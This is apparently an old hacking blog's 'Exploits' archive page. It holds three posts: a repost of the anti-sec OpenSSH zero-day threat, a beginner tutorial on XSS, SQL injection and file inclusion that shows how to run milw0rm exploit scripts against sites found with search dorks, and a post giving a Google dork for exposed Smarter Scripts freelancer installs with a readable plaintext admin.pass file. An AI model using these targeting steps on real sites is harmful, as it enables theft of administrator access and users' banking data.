Archive for the ‘Exploits’ Category

It would seem that the anti-sec movement may make a move which is arguably against their supposed ethics contained in their movement manifesto. It was initially thought that being apart of this Anti-Security Movement was not disclosing vulnerabilities into the public. Well, please read on.

Posted to the full-disclosure mailing list Anti-Sec unveiled their intentions to publicly release working 0day exploit code for OpenSSH <= 5.2. As stated on Mon, 20 Jul 2009 16:32:18:

Dear Reader,
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.

Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
malicious hacker.

Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH.

This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.

Sincerely,

-anti-sec

Opinion:

Are you fucking serious? All this talk on how publicly released exploits are bad, and that security through obscurity is an objective your going to release an exploit. How does this justify anti-sec’s cause? If you ask me this goes against everything their movement is for. An OpenSSH 0day vulnerability must be to much to handle.

Earlier this evening I received some reports that Milw0rm.com, a very very popular ‘Proof of Concept’ exploit website is closing it’s doors.

str0ke just doesnt have the time anymore

Big loss to the skiddies out there? +10 to the anti-sec movement?  Let’s hear your thoughts.

Heres some further reading

http://www.pakbugs.com/news-announcements/9989-milw0rm-shut-down.html

This article is to introduce you to common website vulnerabilities and exploiting. As a beginner we will cover a variety of topics that will explain some of the most common and useful vulnerabilities of websites as well as showing you how to find the vulnerabilities and exploit them. You should at least be familiar with using a computer, browsing the internet as well as know how to identify programming languages. I personally use Linux but I am going to assume you use Microsoft Windows, which it really isn’t going to make a difference at this point. However to start in this article I will talk about types of vulnerabilities, and how to use a site such as milw0rm.com to exploit a vulnerable site.

So to begin let me start by explaining common vulnerabilities you will come across on the web. These are some of the most common and most talked about vulnerabilities and are widely explained about on the web. I however am going to do my best to explain these in best possible way for you to understand. Let’s dive in!

XSS/CSS or Cross Site Scripting is one of many common vulnerabilities that can be found within web applications on the internet, we hear of this term frequently in web application security, as it is probably one of the most tested for vulnerabilities along side of SQL Injection. Do not confuse CSS in this article for Cascading Style Sheets which is the preferred acronym for that technology. I will be using the preferred XSS to identify Cross Site Scripting. XSS is a form of code-injection into a web page that is viewable by other web surfers. There are 3 primary types that are used: persistent, non persistent and DOM based. I will not dwell on explaining each of these types of XSS attacks. In identifying them however I will note which type it is for your reference.

SQL Injection much like XSS (injection) this vulnerability has to do with the database part of a website. The vulnerability is commonly found within web applications that do not properly filter user inputted data. Say you have a website that allows users to post comments on the site, if the data you submit to make a comment includes code/calls to the database when you submit it, and the website does not filter out that code, you will likely be able to grab/display or modify the database entries of the website. A couple forms of SQL injection include Blind SQL injection and incorrect type handling.

LFI and RFI stands for Local File Inclusion and Remote File Inclusion respectively. The first LFI allows for a user to execute a file located on the server hosting the website. An example would be a user using a file upload for images to upload a malicious script, and then executing the file after it uploads. RFI on the other hand allows for a user to execute a script that is not stored on the server but stored on another server or computer.

For the next part of this article I assume you don’t know what milw0rm.com is and how to use it. Milw0rm is one of the best sites in my opinion to find exploits. Since most of the vulnerabilities I have explained above are for web applications we will be looking at the web app section of milw0rm.com. You will notice that using milw0rm is pretty self-explanatory, the only reason I am writing about it however is because I have encountered many people who have absolutely no idea what to do there, or how to use the exploits there.

Goto http://www.milw0rm.com/webapps.php

This page shows exploits made for web applications, it shows the date which is important because when an exploit is found the developers for that application will hurry to close the vulnerability. At the time of this article I will be looking at exploits submitted on February 10th – 11th, 2008 which will be the most current submitted exploits. Lets look at http://www.milw0rm.com/exploits/5099 which is an exploit for Mix Systems Content Management System(CMS). This specific exploit is written in PHP and takes advantage of an SQL injection exploit remotely. Identifying the type of programming used for the exploit is important of course, normally you can identify the the code at the beginning of the script, some use PHP, others PERL, some PYTHON, it just depends what the author chose to use. Some exploits also give you instructions to use the specific script. The Mix Systems CMS exploit explains a usage scenario, since I will be using Terminal/command line to run the script instead of a browser this is the output I get when I run: php 5099.php

Usage: php 5099.php host type num_records
host: Your target ex www.target.com
type: 1 – plugin=katalog bug
2 – plugin=photogall bug
num_records: number or returned records(if 0 – return all)
example: php script.php site.com 10

It explains that in terminal I would type something such as php 5099.php host type num_records to command the execution of the script to perform the exploit on a defined website, the exploitable area of the site and the number of records to return/display, pretty easy right! So now you have to find a vulnerable website that makes use of Mix Systems CMS, this can be easily done using a Search Engine Dork (sometimes the exploits will give you a Dork you can use).

Well this is the end of Part 1 of An Introduction to Web Hacking – Vulnerabilities and Milw0rm. Please remember that milw0rm is not the only site to offer exploits and that these are not the only vulnerabilities that are available to find. Do some reading and research and stay tuned for the next article in this series. Cheers!

I don’t know just how well known this vulnerability is, but it is in my interests to shed some light on just how vulnerable this script is at its default, meaning when it’s installed “as is” without any “extra” programming or fixes. The Smarter Scripts freelancer script is a web application written in PERL (cgi) that allows a person to setup a site like Scriptlance.com and the like. Finding a vulnerable version of it only takes a search engine like google or yahoo. And if I’m not mistaken there is no default secure version.

“Index of /” inurl:freelancers

Query that.

What your looking for in the link to the crawled space are url’s that are addressed like /cgi-bin/freelancers or freelancers/data etc…Having directories traversable on the web can be dangerous for one thing, especially if your running a site that handles money. So as it unfolds within the Smarterscripts freelancer directory structure there lies a nifty little file called admin.pass, lol.

Imagine that.

The file is a plain text file that stores the administrator password to the script allowing a would be attacker access to the entirety of the applications backend of course. Member names with their passwords, banking informations, balances, last ip, last log in etc… all stored here….as well as an opportunity to download a backup of the so called “database” and upload a backup to take the place of the existing one.

smoooooth…